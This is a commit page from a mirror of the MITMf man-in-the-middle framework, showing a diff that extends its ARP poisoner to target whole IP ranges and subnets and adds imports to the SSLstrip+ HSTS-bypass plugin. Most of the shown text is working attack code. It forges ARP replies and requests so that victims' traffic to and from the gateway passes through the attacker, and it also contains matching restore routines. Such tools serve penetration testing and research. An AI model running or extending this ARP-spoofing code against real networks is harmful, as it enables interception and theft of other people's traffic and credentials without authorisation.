github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-08-19 21:13:26 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

fixes #117

Browse source
This commit is contained in:
byt3bl33d3r 2015-06-08 13:38:45 +02:00
commit e3aa8ba617
3 changed files with 132 additions and 56 deletions
Download patch file Download diff file Expand all files Collapse all files

110
core/poisoners/arp/ARPpoisoner.py
View file

@ -1,5 +1,8 @@
import logging import logging
import threading import threading
from traceback import print_exc
from netaddr import IPNetwork, IPRange, IPAddress, AddrFormatError
from time import sleep from time import sleep
from core.utils import shutdown from core.utils import shutdown
from scapy.all import * from scapy.all import *
@ -10,7 +13,11 @@ class ARPpoisoner():
def __init__(self, gateway, interface, mac, targets): def __init__(self, gateway, interface, mac, targets):
self.gatewayip = gateway try:
self.gatewayip = str(IPAddress(gateway))
except AddrFormatError as e:
shutdown("[ARPpoisoner] Specified an invalid IP address as gateway")
self.gatewaymac = getmacbyip(gateway) self.gatewaymac = getmacbyip(gateway)
self.mymac = mac self.mymac = mac
self.targets = self.getTargetRange(targets) self.targets = self.getTargetRange(targets)
@ -24,22 +31,26 @@ class ARPpoisoner():
if targets is None: if targets is None:
return None return None
targetList = list() try:
targets = targets.split(",") targetList = []
for target in targets:
if "-" in target: for target in targets.split(','):
max_range = int(target.split("-")[1]) if '/' in target:
octets = target.split("-")[0].split(".") targetList.append(IPNetwork(target))
f3_octets = ".".join(octets[0:3])
l_octet = int(octets[3]) elif '-' in target:
first_half = target.split('-')[0]
second_half = first_half + target.split('-')[1]
targetList.append(IPRange(first_half, second_half))
for ip in xrange(l_octet, max_range+1):
targetList.append('{}.{}'.format(f3_octets, ip))
else: else:
targetList.append(target) targetList.append(IPAddress(target))
return targetList return targetList
except AddrFormatError as e:
shutdown("[ARPpoisoner] Specified an invalid IP address/range/network as target")
def start(self): def start(self):
if self.gatewaymac is None: if self.gatewaymac is None:
shutdown("[ARPpoisoner] Error: Could not resolve gateway's MAC address") shutdown("[ARPpoisoner] Error: Could not resolve gateway's MAC address")
@ -81,7 +92,11 @@ class ARPpoisoner():
elif self.targets: elif self.targets:
#Since ARP spoofing relies on knowing the targets MAC address, this whole portion is just error handling in case we can't resolve it #Since ARP spoofing relies on knowing the targets MAC address, this whole portion is just error handling in case we can't resolve it
for targetip in self.targets: for target in self.targets:
if type(target) is IPAddress:
targetip = str(target)
try: try:
targetmac = getmacbyip(targetip) targetmac = getmacbyip(targetip)
@ -90,7 +105,6 @@ class ARPpoisoner():
elif targetmac: elif targetmac:
send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="is-at"), iface=self.interface, verbose=self.debug) send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="is-at"), iface=self.interface, verbose=self.debug)
sleep(0.3)
send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="is-at", ), iface=self.interface, verbose=self.debug) send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="is-at", ), iface=self.interface, verbose=self.debug)
except Exception as e: except Exception as e:
@ -98,6 +112,24 @@ class ARPpoisoner():
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e)) mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass pass
if (type(target) is IPRange) or (type(target) is IPNetwork):
for targetip in target:
try:
targetmac = getmacbyip(str(targetip))
if targetmac is None:
mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
elif targetmac:
send(ARP(pdst=str(targetip), psrc=self.gatewayip, hwdst=targetmac, op="is-at"), iface=self.interface, verbose=self.debug)
send(ARP(pdst=self.gatewayip, psrc=str(targetip), hwdst=self.gatewaymac, op="is-at", ), iface=self.interface, verbose=self.debug)
except Exception as e:
if "Interrupted system call" not in e:
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
print_exc()
pass
sleep(self.interval) sleep(self.interval)
def poisonARPreq(self): def poisonARPreq(self):
@ -108,7 +140,11 @@ class ARPpoisoner():
sendp(pkt, iface=self.interface, verbose=self.debug) #sends at layer 2 sendp(pkt, iface=self.interface, verbose=self.debug) #sends at layer 2
elif self.targets: elif self.targets:
for targetip in self.targets:
for target in self.targets:
if type(target) is IPAddress:
targetip = str(target)
try: try:
targetmac = getmacbyip(targetip) targetmac = getmacbyip(targetip)
@ -117,7 +153,6 @@ class ARPpoisoner():
elif targetmac: elif targetmac:
send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="who-has"), iface=self.interface, verbose=self.debug) send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="who-has"), iface=self.interface, verbose=self.debug)
sleep(0.3)
send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="who-has"), iface=self.interface, verbose=self.debug) send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="who-has"), iface=self.interface, verbose=self.debug)
except Exception as e: except Exception as e:
@ -125,6 +160,23 @@ class ARPpoisoner():
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e)) mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass pass
if (type(target) is IPRange) or (type(target) is IPNetwork):
for targetip in target:
try:
targetmac = getmacbyip(str(targetip))
if targetmac is None:
mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
elif targetmac:
send(ARP(pdst=str(targetip), psrc=self.gatewayip, hwdst=targetmac, op="who-has"), iface=self.interface, verbose=self.debug)
send(ARP(pdst=self.gatewayip, psrc=str(targetip), hwdst=self.gatewaymac, op="who-has"), iface=self.interface, verbose=self.debug)
except Exception as e:
if "Interrupted system call" not in e:
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass
sleep(self.interval) sleep(self.interval)
def restoreNet(self, count): def restoreNet(self, count):
@ -133,7 +185,11 @@ class ARPpoisoner():
sendp(pkt, inter=self.interval, count=count, iface=self.interface, verbose=self.debug) #sends at layer 2 sendp(pkt, inter=self.interval, count=count, iface=self.interface, verbose=self.debug) #sends at layer 2
def restoreTarget(self, count): def restoreTarget(self, count):
for targetip in self.targets: for target in self.targets:
if type(target) is IPAddress:
targetip = str(target)
try: try:
targetmac = getmacbyip(targetip) targetmac = getmacbyip(targetip)
@ -144,10 +200,28 @@ class ARPpoisoner():
mitmf_logger.info("[ARPpoisoner] Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count)) mitmf_logger.info("[ARPpoisoner] Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count))
send(ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac), iface=self.interface, count=count, verbose=self.debug) send(ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac), iface=self.interface, count=count, verbose=self.debug)
sleep(0.3)
send(ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac), iface=self.interface, count=count, verbose=self.debug) send(ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac), iface=self.interface, count=count, verbose=self.debug)
except Exception as e: except Exception as e:
if "Interrupted system call" not in e: if "Interrupted system call" not in e:
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e)) mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass pass
if (type(target) is IPRange) or (type(target) is IPNetwork):
for targetip in target:
try:
targetmac = getmacbyip(str(targetip))
if targetmac is None:
mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
elif targetmac:
mitmf_logger.info("[ARPpoisoner] Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count))
send(ARP(op="is-at", pdst=self.gatewayip, psrc=str(targetip), hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac), iface=self.interface, count=count, verbose=self.debug)
send(ARP(op="is-at", pdst=str(targetip), psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac), iface=self.interface, count=count, verbose=self.debug)
except Exception as e:
if "Interrupted system call" not in e:
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass

1
plugins/SSLstrip+.py
View file

@ -24,6 +24,7 @@ import logging
from plugins.plugin import Plugin from plugins.plugin import Plugin
from core.sslstrip.URLMonitor import URLMonitor from core.sslstrip.URLMonitor import URLMonitor
from core.servers.dns.DNSchef import DNSChef from core.servers.dns.DNSchef import DNSChef
from core.utils import IpTables
class HSTSbypass(Plugin): class HSTSbypass(Plugin):
name = 'SSLstrip+' name = 'SSLstrip+'

1
requirements.txt
View file

@ -1,5 +1,6 @@
Twisted Twisted
requests requests
netaddr
scapy scapy
msgpack-python msgpack-python
dnspython dnspython